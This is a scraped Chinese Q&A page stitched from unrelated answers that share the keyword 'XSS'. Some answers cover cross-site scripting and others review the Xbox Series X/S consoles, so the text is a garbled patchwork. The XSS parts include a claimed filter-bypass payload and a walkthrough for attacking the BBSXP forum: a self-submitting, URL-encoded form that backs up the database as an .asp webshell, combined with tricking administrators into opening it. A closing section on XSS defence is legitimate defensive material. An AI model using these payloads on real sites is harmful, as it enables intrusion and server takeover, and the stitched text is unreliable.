浏览器的Xss过滤器机制是什么,为什么有些反射型Xss不会触发过滤器
首先要说明的是 它是webkit的一个模块,而非chrome ,所以Safari和360安全浏览器极速模式等webkit内核的浏览器都有XSS过滤功能.
过滤方式:
通过模糊匹配 输入参数(GET query| POST form data| Location fragment ) 与 dom树,如果匹配中的数据中包含跨站脚本则不在输出到上下文DOM树中.另外,匹配的规则跟CSP没有什么关系,最多是有参考,CSP这种规范类的东西更新速度太慢跟不上现实问题的步伐.
关闭模式:
因为它有可能影响到业务,所以浏览器提供了关闭它的HTTP响应头.
X-XSS-Protection: 0
绕过方式:
因为专门做这方面的原因所以对绕过也有所了解,目前我发布过的一个bypass 0day还可以继续使用.
svgscript xlink:href=data:,alert(1)/script/svg
为什么xss注入执行了,刷新就没了,对其他人没有影响
XSS注入的本质
就是: 某网页中根据用户的输入, 不期待地生成了可执行的js代码, 并且js得到了浏览器的执行. 意思是说, 发给浏览器的字符串中, 包含了一段非法的js代码, 而这段代码跟用户的输入有关.
常见的XSS注入防护, 可以通过简单的 htmlspecialchars(转义HTML特殊字符), strip_tags(清除HTML标签) 来解决, 但是, 还有一些隐蔽的XSS注入不能通过这两个方法来解决, 而且, 有时业务需要不允许清除HTML标签和特殊字符. 下面列举几种隐蔽的XSS注入方法:
IE6/7 UTF7 XSS 漏洞攻击
求问能来有Xbox 本世代与次世代实机对比?
微软的次世代主机Xbox Series X已经于今日正式发售,而索尼的PlayStation 5也将在两天后,11月12日发售,新一轮主机大战的硝烟已经逐渐弥漫。
和7年前PS4和Xbox One发售时不同,如今两家都从单一机型的销售策略,转变向分别推出不同硬件配置的机型来满足不同消费者的需求。面对499、399、299美元,光驱版、数字版等一系列不同的主机型号,相信不少新玩家已经有些犯难了。
加上索尼微软各自在游戏阵容、平台服务、旧平台兼容、运营政策上又有不少区别,因此本世代两代主机的购买也就多了几分选择困难。所以这次我们将从硬件、游戏阵容、会员服务、以及购买推荐这几个方面进行分析。相信不管新老玩家看完都能有更进一步的认识。
谁是地表最强次世代主机?
选硬件当然第一时间看性能。尽管在硬件配置阶段,微软与索尼两家明显在着力点上存在着不同,但从总体性能上来看,目前微软的旗舰机型XSX更胜PS5一筹,是当之无愧的最强性能次世代主机。
CPU方面,虽然双方均采用了8核心AMD Zen 2 CPU架构,纸面性能与去年上市的锐龙3700x相仿,但XSX最高3.8GHz的运算频率略优于PS5的3.5GHz,差距不算太大。
而在GPU方面,Xbox Series是目前唯一支持RDNA 2架构完整特性的次世代主机
尽管GPU的提供商AMD此前已经承认两台同样都采用了RDNA 2.0架构GPU,但在定制层面存在着比较大的差距。10月底AMD公开RDNA 2架构显卡产品时,微软也随即宣布Xbox Series X/S是唯一完整支持RDNA 2特性的主机,包括DXR光线追踪、网格着色器、取样反馈和可变速率着色。
换言之,索尼PS5采用的GPU并不能完整支持以上这些特性,这也是此前索尼一直宣称其GPU为“基于RDNA 2架构”的原因。目前可以肯定的是,PS5将不支持网格着色器,取而代之的是AMD在上一代RDNA架构中公布的Primitive Shader定制化后的“几何引擎”(Geometry Engine)。
当然,如果你对以上这些特性不甚了解,简单的纸面示例还是能说明基本问题的——XSX拥有每秒高达12TFlops的单精度浮点运算力与52个控制单元,PS5则只有10.3TFlops与36个控制单元。
分辨率:8K时代真的来临了吗?
此外,两家均宣称支持4K甚至8K分辨率,以及最高120帧的画面,但实机效果因游戏而异,目前已经发售的XSX经过测试,向下兼容的《只狼:影逝二度》、《巫师3》等本世代游戏都可以在4K分辨率下达到60帧左右的流畅水平,当然具体的测试还得到拿到机器之后再给出。而PS5的8K分辨率支持则需要之后通过系统更新获取。
由于光线追踪需要消耗大量的机能,大多数游戏在次世代主机上为了兼容分辨率和光追效果,都会选择牺牲帧数。以《鬼泣5 特别版》为例,在开启光线追踪的情况下,两台主机都只能在4K分辨率下维持30帧,或是在1080P分辨率下保持60帧;而如果关闭光追,则可以在4K分辨率下跑到60帧或120帧。
由此我们可以看出,目前的次世代主机还不能够自如地将光线追踪、4K或8K高分辨率、高帧数三个诉求全部兼容,受制于成本和售价,玩家还是要在其中做取舍——毕竟最贵的XSX和PS5,官方售价也只有499美元,和高性能PC相比还是便宜不少的。
存储:索尼的SSD真的是黑科技吗?
数据存储方面,此次两家皆升级至16GB GDDR6高速内存。不过XSX的内存有着320-bit 位宽与最高560GB/s的非对称带宽。PS5的内存则采用256-bit位宽与448GB/s的带宽。
面对硬盘这个读写速度的短板,次世代两家同时抛弃了慢速的机械硬盘,全面改用吞吐速度更快的固态硬盘。而这部分,两家又有着较大的差距,索尼自宣发时期就着重强调PS5的固态硬盘性能。
XSX内置1TB容量的定制SSD,可用容量为802GB,非压缩传输速率达到2.4GB/s。配合微软的黑科技Quick Resume功能,允许玩家不中断当前游戏并保留当前游戏状态的前提下,快速打开其他游戏游玩,并可以在数款游戏之间快速切换。经过测试,XSX可以轻松地在10秒内从《无主之地3》切换到《我的世界:地下城》。当然,这个数据受不同游戏影响也会产生浮动,不过仍然是一个非常强大的功能。
需要注意的是,XSX并没有提供比较大众的扩容接口,玩家可以购买微软官方的1TB扩容卡来增加主机的容量,不过这款微软与希捷合作定制的1TB扩容卡售价高达220美元,价格不菲。
PS5定制SSD有着极其惊人的5.5GB/s非压缩速率,是XSX的两倍以上,大大加速了游戏载入读取的时间。相比起PS4上《黑魂3》死一次就要等个10几20秒,未来玩家在游玩《恶魔之魂 重制版》时可以在死亡后立刻重来,真是可喜可贺(?)。
不过PS5硬盘的高速率也是有代价的,其容量仅有825GB,可用容量仅665GB。除去系统占用,预期实机可用容量还会更少。同时这块定制SSD是焊接在主板上,难以拆换,这对于机器的良品率与售后维修提出了更高的要求。不过索尼也单独提供了PCIe 4.0规格的M.2 接口,方便玩家自行购置SSD扩充容量,不过必须满足PS5的最低性能水平。
此前Gamespot针对两台次世代主机内置SSD的载入速度进行了测试,有些诧异的是尽管PS5有大吞吐量SSD的加持,加载速度上整体还是稍逊于XSX。由于测试的是本世代游戏而非次世代游戏,此前索尼也曾表示第一方的次世代游戏将针对这块SSD进行专门优化,期待后续的表现。
这里还是列出Gamespot经过测试的本世代游戏载入速度:
《荒野大镖客2》
PS5 1:04
XSX 1:02
《最终幻想15》
PS5 1:10
XSX 0:43
《命运2》
PS5 1:37
XSX 1:12
《怪物猎人世界》
PS5 0:51
XSX 0:29
《蝙蝠侠:阿卡姆骑士》
PS5 1:07:27
XSX 58:48
相比本世代主机,双方在载入速度上的提升都已经非常明显了,无论选择哪一台主机,玩家的体验都将得到大幅度的改善,再也不需要长时间坐在显示器前等待读盘,也不需要那些连通关卡场景的长隧道来争取素材加载的时间了。
散热:截然不同的解决方案
强悍的机能势必伴随着散热的问题,XSX这边采用结构紧凑的垂直风道散热设计,外观小巧的同时可以任意竖放或侧放。相比之下,PS5安装了导热性优异的液态金属,但遇到品控不好的机器则有漏液报废的可能。此外,PS5的热管散热片占用了大量空间,导致整机体积达到PS4 pro 的两倍,XSX的1.5倍之大。尽管体积庞大,造型一言难尽,但PS5的侧板可自由拆卸,未来想必会有一堆魔改自制外壳,让主机看起来养眼一些。而且PS5还有个非常有趣的设计,那就是专门提供了一个集尘口方便玩家用吸尘器进行日常清灰,可以降低主机长期使用后造成的灰尘累积。
我相信不少朋友都体验过自己的PS4或是PS4 PRO在运行本世代末游戏时那恐怖的风扇噪音,有一点可以肯定的是,两台次世代主机都会更加安静。根据数毛社Digital Foundry的测试,XSX运行时相当安静,甚至不需要使用噪音表单独测试,而散热温度方面,运行《战争机器5》时机器表面温度为48-49度,表现良好。
版本:按需选择
值得一提的是,与XSX同步发售的,还有微软的轻量级次世代主机:Xbox series S,相比起XSX,XSS最大的特点就是体积小,无光驱,板载硬盘缩减至512G,显卡浮点算力为XSX的1/3,主打2k分辨率和高帧数,更适合不追求高分辨率的玩家购买。根据游戏的优化和规模不同,XSS也能够在一些游戏中开启光线追踪,比如XSS运行《看门狗:军团》时就是支持光追的,而运行《鬼泣5 特别版》时则不行。这方面还是以具体游戏为准。
而索尼的PS5也分为带蓝光光驱的标准版和无光驱的数字版,不过不像XSX和XSS存在性能上的差异,PS5的数字版和标准版主要在于光驱的有无,以及外观、重量上的不同。当然,如果选购数字版,那么今后就只能选择数字版游戏,也就无缘国内比较流行的实体盘二手回收了,还请留意。
游戏阵容:独占策略与订阅制的两极
说完硬件,再来看主机最核心的驱动力,游戏阵容。
目前索尼与微软都已经公布了各自的首发游戏,同时也阐明了玩家最关心的上世代游戏过度的问题
独占
在主打的独占游戏方面。索尼以魂系列玩家魂牵梦绕的《恶魔之魂 重制版》打头阵,再加上《漫威蜘蛛侠:迈尔斯·莫拉莱斯》、《麻布仔大冒险》、《太空人的娱乐室(Astro's Playroom)》这几款游戏作为PS5年内首发独占游戏,原定首发独占的《毁灭全明星》则延期至2021年。
这之外还有《Returnal》、《GT赛车7》、《战神:诸神黄昏》、《地平线2:西部禁域》这几款独占游戏仍在开发中,暂时未公布发售日。同时贝塞斯达旗下的《死亡循环》、《幽灵线:东京》发售后也将在PS5上限时独占一段时间。
相较于索尼坚定的独占打法,微软近几年主推“play anywhere”的则是多平台互通策略。Xbox老大Phil Spencer曾强调过,微软的目标是,玩家买的游戏不只能在Xbox Series X、Windows 10 PC上玩,甚至随着xCloud的兴起,还可以延伸到移动设备上。
这也就意味着Xbox的独占游戏同时也会登录PC,包括为新主机保驾护航的《光环:无限》(虽然延期了),《脑航员2》、《神鬼寓言》新作、《极限竞速》新作、《腐烂国度3》、黑曜石新作《Avowed》和《暮色降临(As Dusk Falls)》等等游戏,都会一同登陆PC。
不过由于今年9月微软收购了贝塞斯达的母公司ZeniMax Media及其旗下工作室,未来如《上古卷轴》、《辐射》、《毁灭战士》等贝塞斯达和旗下工作室制作的游戏很有可能在Xbox和Windows PC平台独占或是限时独占,对于索尼的独占策略来说也是很大的冲击。具体还要看微软的策略。
向下兼容
除了独占游戏外,两家主机均兼容了旧世代游戏。微软的XSX将会延续之前XBOX ONE向下兼容的政策,即兼容XBOX 360、XBOX初代游戏的同时提供更强的画质升级。这等于玩家只需购买一台主机就能坐拥四代同堂的海量游戏阵容。对于经常想要怀旧的玩家而言,XSX这一卖点非常值得去投入。
PS5则兼容99%的PS4游戏,并且同样基于更高的硬件配置提供更高的画质体验。
订阅服务:微软的XGP更香
最后,在订阅制服务这块,微软与索尼有着决定性的差距。
微软的Xbox Game Pass订阅服务价格实惠,新玩家仅需10港币(1美元)就能尝鲜一个月。正常购买一年的费用大约等于一到两款3A的价格,即可以享受库内上百款新旧精选游戏。不仅每月会有新游戏加入XGP,部分微软独占游戏与第三方游戏首发即纳入其中。此外,拥有XGP还将获得买游戏享8折,DLC9折的优惠。
Xgp已经包含了EA play,容纳更多游戏
不仅如此,微软最近大手笔收购贝塞斯达后,确认会将贝塞斯达旗下游戏加入到XGP。未来像《上古卷轴6》、《星空》、《辐射》新作这类B社重磅作品,都可以在XGP订阅服务中以低廉的价格享受到,而无需花费六七十美元去单独购买。
索尼这边则升级了一贯以来的PlayStation Plus会员,提供名为PlayStation Plus Collection免费游戏服务。只要付费成为 PS Plus 会员,不需要另外再付出额外费用,就可以在PS5主机上免费畅玩其中所包含的经典PS4游戏。
目前已经在PlayStation Plus Collection列表中的游戏如下
第一方:
《血源诅咒》
《往日不再》
《底特律:变人》
《战神》
《声名狼藉:次子》
《瑞奇与叮当》
《最后的守护者》
《最后生还者 重制版》
《直到黎明》
《神秘海域4:盗贼末路》
第三方:
《蝙蝠侠:阿卡姆骑士》
《战地1》
《使命召唤:黑色行动3 僵尸历代记版》
《古惑狼 疯狂三部曲》
《辐射4》
《最终幻想15 皇家版》
《怪物猎人:世界》
《真人快打10》
《女神异闻录5》
《生化危机7》
大前提:如何买到机器
说了这么多,可能大家都在面临一个比较大的问题,买不到,或者说买不起。
参考上一世代主机首发大幅溢价,一机难求的状况,尽管我们已经做好了新机首发价格炒上天的准备,但是实际情况还是非常夸张。
PS5在某宝价格被炒到将近一万元
热度低一些的XSX价格也达到了六千左右
特别是目前两家的国行机还未有消息,在主流的电商渠道通常很难以平价购入新世代主机。加上目前疫情期间肉身出国购买确实麻烦,如果不是有购机刚需的朋友,还是建议根据自身实际情况观望一阵。
考虑到微软近年开始力推XBOX主机与Windows 10 PC互通政策,XGP订阅服务也在逐渐覆盖Windows 10 PC端,未来将会有更多微软旗下的游戏加入到Windows 10商店中。
如果你手头拥有高配电脑,可以考虑购买PC端的XGP服务使用,待主机价格稳定后再出手。
而现今PS4主机全球普及率较高,未来一段时间内出的新游戏想必也不会缺席PS4平台。若是手持PS4想要换机的朋友,同样可以稍微等等,选购《刺客信条:英灵殿》这种可以免费升级到下世代版本的游戏先玩着,等待PS5价格冷却下来之后再购买也不迟。
最近网上流行的XSS是什么意思
就个人而言,我把XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。 然后利用下面的技术得到一个shell.[编辑本段]如何利用 传统的跨站利用方式一般都是攻击者先构造一个跨站网页,然后在另一空间里放一个收集cookie的页面,接着结合其它技术让用户打开跨站页面以盗取用户的cookie,以便进一步的攻击。个人认为这种方式太过于落后,对于弊端大家可能都知道,因为即便你收集到了cookie你也未必能进一步渗透进去,多数的cookie里面的密码都是经过加密的,如果想要cookie欺骗的话,同样也要受到其它的条件的限约。而本文提出的另一种思路,则从一定程度上解决上述的问题。对于个人而言,比较成熟的方法是通过跨站构造一个表单,表单的内容则为利用程序的备份功能或者加管理员等功能得到一个高权限。下面我将详细的介绍这种技术。[编辑本段]来自内部的跨站攻击 寻找跨站漏洞 如果有代码的话比较好办,我们主要看代码里对用户输入的地方和变量有没有做长度和对”〈”,”〉”,”;”,”’”等字符是否做过滤。还有要注意的是对于标签的闭合,像测试QQ群跨站漏洞的时候,你在标题处输入〈script〉alert(‘test’)〈/script〉,代码是不会被执行的,因为在源代码里,有其它的标签未闭合,如少了一个〈/script〉,这个时候,你只要闭合一个〈/script〉,代码就会执行,如:你在标题处输入〈/script〉〈script〉alert(‘test’)〈/script〉,这样就可以弹出一个test的框。 如何利用 我先以BBSXP为例,过程已做成动画,详情可见光盘中的动画。我举BBSXP中其中两个比较好用的跨站漏洞点为例. a.先注册一个普通用户,我这里注册的用户是linzi.然后我们在个人签名里写入: c.然后发个贴子,可以结合其它技术欺骗管理员浏览发的贴子。 d.因为是测试,所以我们以管理员身份登陆,然后打开贴子,我们会发现,linzi已经变成了社区区长工,如图一所示 除此之外我们只要在个人签名里输入 同样发个贴子等,只要管理员打开了,就会加了一个扩展名为asp (有空格)的上传扩展,这个时候,你只要上传一个newmm.asp (有空格)就可以得到一个shell. 上面的攻击多多少少有点局限性,虽然可以得到shell,但是隐蔽性不太好,因为签名 处受到了长度的限制,不能超过255个字符。我们可以结合flash跨站实现更为隐蔽的 攻击,对于flash木马的制作,下面见哥们丰初的介绍。 再利用如下: 修改一下个人头像的url,输入代码如下: 再接着欺骗管理员打开你的资料或者浏览你的贴子,当管理员打开后,会在后台自动加个php扩展名的后辍,因为bbsxp在个人头像url里过滤了空格,%,所以我们只能加个不包括空格的其它扩展,当然你也可以加个shtml的扩展,有了它你就可以用来查看源代码,然后进一步攻击。[编辑本段]来自外部的跨站攻击 有的时候,当我们对于目标程序找不到可以利用的跨站点,这个时候我们可以利用可以从外部入手,利用我们要拿下的是它的论谈,论谈的安全性做的很好,但其留言板却存在跨站漏洞,这个时候我们可以在留言板里写入跨站语句,跨站语句为以表单的方式向论谈提交提升权限的语句,如上面的bbsxp加asp 扩展的语句。当然我们可利用后台的备份功能直接得到一个shell。 例:先上传一个文件linzi.txt,内容如下: 〈body onload="javascript:document.forms[0].submit()"〉〈form action=" http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf " method="post"〉〈input value="database/bbsxp.mdb" name="yl" 〉〈input value="database/shit.asp" name="bf" 〉〈/body〉〈/html〉 上面的代码是把论谈的数据库备份为shit.asp,留言板存在跨站点如下: http://127.0.0.1/bbsxp/page2.asp?username= 我们构造备份跨站语句如下: http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%66%6F%72%6D%73%5B%30%5D%2E%73%75%62%6D%69%74%28%29%22%3E%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%62%62%73%78%70%2F%61%64%6D%69%6E%5F%66%73%6F%2E%61%73%70%3F%6D%65%6E%75%3D%62%61%6B%62%66%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%62%62%73%78%70%2E%6D%64%62%22%20%6E%61%6D%65%3D%22%79%6C%22%20%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%73%68%69%74%2E%61%73%70%22%20%6E%61%6D%65%3D%22%62%66%22%20%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E 或者构造跨站语句,利用iframe打开一个0大小的linzi.txt。 当管理员打开后,会自动备份得到一个shell.[编辑本段]XSS与其它技术的结何 从上面的实例,我们可以知道,如何欺骗管理打开是一个很重要的步骤,对于欺骗打开,除了社会工程学外,我们可以结合其它的技术,如sql injection.当我们渗透一个网站之时,主站mssql注入漏洞,权限为public,这个时候我们利用update构造跨站语句,如用iframe打开一个上面的备份得到shell的跨站语句等,同样,我们可以在社会工程学时,利用QQ的其它跨站漏洞等等。 总是对于欺骗也是一门艺术,具体怎么利用,大家就发挥自己的想象力吧! 好一个欺骗也是一门艺术,不管是在生活中还是在网络中。生活中难免有些事情不能讲真话,这时采用适当的方法使得我们的假话当作真话讲,这就靠欺骗的艺术了。
为什么我的xss 攻击不显示图片
网页图片无法显示的原因大致如下:
1,网速问题。导致没有打开网页上的图片,检查网速即可;
2,浏览器问题。导致图片不正常显示,更新、重装当前浏览器,或者换用其他浏览器即可;
3,网站删除了图片,导致如此显示效果。如果其他网站图片正常,只有这个网站无法显示,那么这个无法解决;
4,电脑缺失flash插件。更新或者安装flash插件即可。
xss为什么网上比官网还贵
中间商赚差价
XboxSeriesS简称为xss
造型小巧的XSS其外包装也非常的简约。白色的主题设计颇具质感,标志性的Xbox西瓜键和黑色散热孔都在正面很好的展示了出来。
打开包装,就可以看到本次的主角,XboxSeriesS。相较于以往的主机,XSS显得格外的小巧,但同时有着主机级别的性能,能够流畅运行3A游戏并带来精美的画面表现,这不仅仅要感谢新架构带来的性能提升,更要感谢微软精妙的工业设计力,让如此小巧的机身就能够满足其散热的要求。
XSS小巧的身形使得它可以轻松放置在55寸电视和电视柜之间的空隙。这别说是次世代主机了,就连上一代末期的X1X、PS4Pro等机型都很难做到。和其他主机相比,XSS可以更轻松的融入到你的电视柜、书桌、书柜之中。
由于采用了纯数字化的设计,XSS并没有搭载光驱,因此正面面板十分简洁,一个西瓜键用于开关机、一个蓝牙配对键用于连接手柄,还有一个USB接口,用于连接各种外设
如何正确防御xss攻击
XSS攻击通常是指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。
一、HttpOnly防止劫取Cookie
HttpOnly最早由微软提出,至今已经成为一个标准。浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie。目前主流浏览器都支持,HttpOnly解决是XSS后的Cookie支持攻击。
我们来看下百度有没有使用。
未登录时的Cookie信息
可以看到,所有Cookie都没有设置HttpOnly,现在我登录下
发现在个叫BDUSS的Cookie设置了HttpOnly。可以猜测此Cookie用于认证。
下面我用PHP来实现下:
?php
header("Set-Cookie: cookie1=test1;");
header("Set-Cookie: cookie2=test2;httponly",false);
setcookie('cookie3','test3',NULL,NULL,NULL,NULL,false);
setcookie('cookie4','test4',NULL,NULL,NULL,NULL,true);
?
script
alert(document.cookie);
/script
js只能读到没有HttpOnly标识的Cookie
二、输入检查
输入检查一般是检查用户输入的数据中是否包含一些特殊字符,如、、'、"等,如果发现存在特殊字符,则将这些字符过滤或者编码。
例如网站注册经常用户名只允许字母和数字的组合,或者邮箱电话,我们会在前端用js进行检查,但在服务器端代码必须再次检查一次,因为客户端的检查很容易绕过。
网上有许多开源的“XSS Filter”的实现,但是它们应该选择性的使用,因为它们对特殊字符的过滤可能并非数据的本意。比如一款php的lib_filter类:
$filter = new lib_filter();
echo $filter-go('1+11');
它输出的是1,这大大歪曲了数据的语义,因此什么情况应该对哪些字符进行过滤应该适情况而定。
三、输出检查
大多人都知道输入需要做检查,但却忽略了输出检查。
1、在HTML标签中输出
如代码:
?php
$a = "scriptalert(1);/script";
$b = "img src=# onerror=alert(2) /";
?
div?=$b?/div
a href="#"?=$a?/a
这样客户端受到xss攻击,解决方法就是对变量使用htmlEncode,php中的函数是htmlentities
?php
$a = "scriptalert(1);/script";
$b = "img src=# onerror=alert(2) /";
?
div?=htmlentities($b)?/div
a href="#"?=htmlentities($a)?/a
2、在HTML属性中输出
div id="div" name ="$var"/div
这种情况防御也是使用htmlEncode
在owasp-php中实现:
$immune_htmlattr = array(',', '.', '-', '_');
$this-htmlEntityCodec-encode($this-immune_htmlattr, "\"script123123;/script\"");
3、在script标签中输出
如代码:
?php
$c = "1;alert(3)";
?
script type="text/javascript"
var c = ?=$c?;
/script
这样xss又生效了。首先js变量输出一定要在引号内,但是如果我$c = "\"abc;alert(123);//",你会发现放引号中都没用,自带的函数都不能很好的满足。这时只能使用一个更加严格的JavascriptEncode函数来保证安全——除数字、字母外的所有字符,都使用十六进制"\xHH"的方式进行编码。这里我采用开源的owasp-php方法来实现
$immune = array("");
echo $this-javascriptCodec-encode($immune, "\"abc;alert(123);//");
最后输出\x22abc\x3Balert\x28123\x29\x3B\x2F\x2F
4、在事件中输出
a href="#" onclick="funcA('$var')" test/a
可能攻击方法
a href="#" onclick="funcA('');alter(/xss/;//')"test/a
这个其实就是写在script中,所以跟3防御相同
5、在css中输出
在owasp-php中实现:
$immune = array("");
$this-cssCodec-encode($immune, 'background:expression(window.x?0:(alert(/XSS/),window.x=1));');
6、在地址中输出
先确保变量是否是"http"开头,然后再使用js的encodeURI或encodeURIComponent方法。
在owasp-php中实现:
$instance = ESAPI::getEncoder();
$instance-encodeForURL(‘url’);
四、处理富文体
就像我写这篇博客,我几乎可以随意输入任意字符,插入图片,插入代码,还可以设置样式。这个时要做的就是设置好白名单,严格控制标签。能自定义 css件麻烦事,因此最好使用成熟的开源框架来检查。php可以使用htmlpurify
五、防御DOM Based XSS
DOM Based XSS是从javascript中输出数据到HTML页面里。
script
var x = "$var";
document.write("a href='"+x+"'test/a");
/script
按照三中输出检查用到的防御方法,在x赋值时进行编码,但是当document.write输出数据到HTML时,浏览器重新渲染了页面,会将x进行解码,因此这么一来,相当于没有编码,而产生xss。
防御方法:首先,还是应该做输出防御编码的,但后面如果是输出到事件或脚本,则要再做一次javascriptEncode编码,如果是输出到HTML内容或属性,则要做一次HTMLEncode。
会触发DOM Based XSS的地方有很多:
document.write()、document.writeln()、xxx.innerHTML=、xxx.outerHTML=、innerHTML.replace、document.attachEvent()、window.attachEvent()、document.location.replace()、document.location.assign()